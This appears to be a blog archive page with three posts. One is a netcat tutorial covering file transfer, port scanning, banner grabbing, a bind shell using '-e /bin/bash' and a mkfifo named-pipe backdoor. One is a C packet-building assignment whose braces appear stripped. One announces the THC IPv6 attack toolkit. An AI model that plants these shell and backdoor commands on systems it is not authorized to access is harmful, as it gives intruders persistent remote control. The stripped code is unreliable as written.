Showing posts with label internet protocol. Show all posts
Showing posts with label internet protocol. Show all posts

Monday 22 October 2012

Ninja Fu With Netcat - Hacker's Swiss Army Knife

Netcat is one of my favorite tools for network investigations and backdoor planting. Netcat is a seemingly simple but very powerful and useful tool to read and write network connections using TCP or UDP. In this post, we will see several examples of using netcat in different scenarios.

First of all, if you are using distros like Ubuntu, they are probably including the OpenBSD netcat which does not provide a very useful switch that lets us execute any command. The netcat-traditional offers this switch so for learning purpose, you should install the netcat-traditional package by issuing the command below in Ubuntu & its derivatives (However, beware of inherent risk with this feature of the traditional netcat):

samar@samar-Techgaun:~$ sudo apt-get install netcat-traditional

Now you can use both OpenBSD and traditional versions by using nc.openbsd and nc.traditional respectively. However, the nc command might still be symbolically linked with nc.openbsd (/etc/alternatives/nc). If you want to permanently use nc to refer nc.traditional, type the following command (or do sudo rm /bin/nc && sudo ln -s /bin/nc.traditional /bin/nc):

samar@samar-Techgaun:~$ sudo update-alternatives --config nc

As I had already said, netcat is a very useful tool for network related works and hence often referred as Hacker's Swiss Army Knife and TCP/IP Swiss Army Knife. You can use netcat for several purposes such as file transfer, port scanning, listen server, bind & reverse shells, backdoors, etc. Because of this, netcat has been a favorite tool for hackers to get and maintain access to the servers.

Before beginning with the examples, I would like to inform you that most of the times ports above 1024 are used to create listen servers with netcat. This is because ports below 1024 are reserved by OS for core network services and you can not bind to these ports without special privilege to the system.

Simple Netcat Listen Server

samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...

Simple Netcat Client

samar@samar-Techgaun:~$ nc -vvn 1234
(UNKNOWN) [] 1234 (?) open

Once the client gets connected, the netcat listener might then look like this:

samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [] from samar-Techgaun.local [] 38700

Noticed the port 38700 in the end? This is the port that the client uses to talk with the server. Observe that the value is much higher than 1024 and hence such ports are known as ephemeral port.

Once the client and server get connected, you can write anything and press ENTER. The data will get transmitted to the other end thus making netcat a data transfer tool.

Open Raw Connection With Netcat as client

samar@samar-Techgaun:~$ nc -vv 80
Warning: inverse host lookup failed for Unknown host [] 80 (http) open
HEAD / HTTP/1.0\n\n

HTTP/1.1 200 OK
Date: Mon, 22 Oct 2012 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8

sent 21, rcvd 171

As seen above, I opened the RAW connection to and then issued HEAD / HTTP/1.0\n\n request to obtain the HTTP header. You can also notice (see web server version & PHP version?) that netcat can be used for basic fingerprinting and banner grabbing. Of course, this is not limited to HTTP fingerprinting. Extend the idea to work with other services.

Web Server Example Using Netcat

samar@samar-Techgaun:~/Desktop/test$ { echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c < my_file)\r\n\r\n"; cat my_file; } | nc -lv -p 8080
listening on [any] 8080 ...

This example taken from Wiki entry works as a one shot webserver hosting the my_file's content which can be accessed through web browser by specifying http://server:8080.

File Transfer Using Netcat

To transfer file from server to client, set up the server as below:

samar@samar-Techgaun:~$ cat my_file
samar@samar-Techgaun:~$ nc -lvp 1234 < my_file
listening on [any] 1234 ...

In the client end, do:

samar@samar-Techgaun:~$ nc -vv 1234 > output.txt
samar-Techgaun.local [] 1234 (?) open
^C sent 0, rcvd 10
samar@samar-Techgaun:~$ cat output.txt

Port Scanning With Netcat

samar@samar-Techgaun:~$ nc -nvz -w1 1-1024
(UNKNOWN) [] 80 (http) open
(UNKNOWN) [] 23 (telnet) open
(UNKNOWN) [] 21 (ftp) open

If you wish to scan number of hosts (or full network), you can do something like below:

samar@samar-Techgaun:~/Desktop/test$ for ip in $(seq 1 254); do nc -nvz -w1 192.168.1.$ip 1-1024; done

In the first example, ports 1-1024 are scanned in the host and in the second example, a class C network is scanned. However, netcat is by no means an advanced port scanner and tools such as nmap are great for this job.

Spawn a process

The -e switch can be specified to spawn a process in the system. In the server, type the command below:

samar@samar-Techgaun:~$ nc -lv -p 1234 -e /bin/bash
listening on [any] 1234 ...

At the other end, you will just connect to the just started netcat service and then issue any command that the bash recognizes. Good for shells in the servers, isn't it?

samar@samar-Techgaun:~$ nc -vv 1234
samar-Techgaun.local [] 1234 (?) open

Netcat backdoor using mkfifo

Since the normal pipe (|) is not so reliable & works in a unidirectional fashion, linux offers something called named pipes which can be exploited to create advanced backdoor in the systems which might not consist the netcat with -e support.

samar@samar-Techgaun:~$ mkfifo /tmp/b4ck; sh /tmp/b4ck | nc -lvp 1234 > /tmp/b4ck
listening on [any] 1234 ...

At the other end, you just need to connect to the newly created netcat service port:

samar@samar-Techgaun:~$ nc -vv 1234
localhost [] 1234 (?) open
sent 3, rcvd 33

I hope this post provides some directions on how to work with netcat and proves that netcat is called TCP/IP swiss army knife for the reason. There are other several possibilities with netcat. Explore to get more out of this awesome tool. ;)


Monday 20 August 2012

Build A Sample Custom Packet [Embedded Systems]

This code snippet was my submission for embedded systems assignment from the embedded system black book by Dr. K.V.K.K. Prasad. It is in no way a real packet and is not meant to represent the IP layer.

Question: Write a C program that takes the filename as input and generates packets of 100 bytes. Develop a simple packet format of your own.


gcc -Wall -lm -o custom_packet custom_packet.c

//eg: ./custom_packet /home/samar/Desktop/cs_rules.txt
//Compilation: gcc -Wall -lm -o custom_packet custom_packet.c
//Custom Packet: Header -> 20 bytes and Data -> 80 bytes
//Find me on

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <math.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

typedef struct
        int8_t fragment_offset;
        int8_t ttl;
        int32_t source_ip;
        int32_t dest_ip;
} custom_packet_header;

typedef struct
        custom_packet_header header;
        char data[80];
} custom_packet;

long int get_file_size(char fname[])
        int fd;
        int count;
        if ((fd = open(fname, O_RDONLY)) == -1)
                perror("Error reading the file\n");
        struct stat buf;
    fstat(fd, &buf);
    count = buf.st_size;
        return count;

int decimalip2numeric(int a, int b, int c, int d)
        return (a * 16777216 + b * 65536 + c * 256 + d);

/*char * numericip2decimal(int num)
        char strs[4];
        strs[0] = (char *) num / 1677;

int main(int argc, char **argv)
        FILE *fp;
        //char fname[256];      //255 bytes is the limit of filename in extN filesystems
        custom_packet * packets;
        long int fsize;
        int num_of_packet, i;
        if (argc != 2)
                printf("Usage: %s filename\n", argv[0]);
        fsize = get_file_size(argv[1]);
        num_of_packet = ceil((double)fsize / 80.0);
        printf("%ld => %d",fsize, num_of_packet);
        if ((fp = fopen(argv[1], "rb")) == NULL)
                perror("Error opening the file");
        packets = (custom_packet *) malloc(sizeof(custom_packet) * num_of_packet);
        for (i = 0; i < num_of_packet; i++)
                packets[i].header.source_ip = decimalip2numeric(127, 0, 0, 1); //storing source ip as for now
                packets[i].header.dest_ip = decimalip2numeric(127, 0, 0, 1); //storing dest ip as for now
                packets[i].header.ttl = 127;
                packets[i].header.fragment_offset = i;
        i = 0;
        while (!feof(fp))
                fread((void *)packets[i].data, 80, 1, fp);
        printf("\n\n----- Printing all the crafted packets -----\n\n");
        for (i = 0; i < num_of_packet; i++)
                printf("[---- Packet Fragment no. %d ----", packets[i].header.fragment_offset);
                printf("\nSource IP -> %d\nDestination IP -> %d\nTime to live -> %d\n", packets[i].header.source_ip, packets[i].header.dest_ip, packets[i].header.ttl);
                printf("Packet data -> %s", packets[i].data);
                printf("\n---- End of Packet no. %d ----]\n\n", packets[i].header.fragment_offset);
        return 0;


Friday 19 August 2011

IPV6 Attacking Toolkit - THC-ipV6 Toolkit Released

The famous hackers group The Hacker Choice(THC) has released a set of tools to attack the IPv6 protocol. IPv6 is the descendant of IPv4 protocol which was purposed due to exhaustion of the IPv4 pool.

THC writes:

THC is proud to be the first who are releasing an comprehensive attack toolkit for the IPv6 protocol suite. It comprises of state-of-the-art tools for alive scanning, man-in-the-middle attacks, denial-of-service etc. which exploits inherent vulnerabilities in IPv6. Included is a fast and easy to use packet crafting library to create your own attack tools.

For more information on the project, visit the THC IPv6 Project Page.

Download Here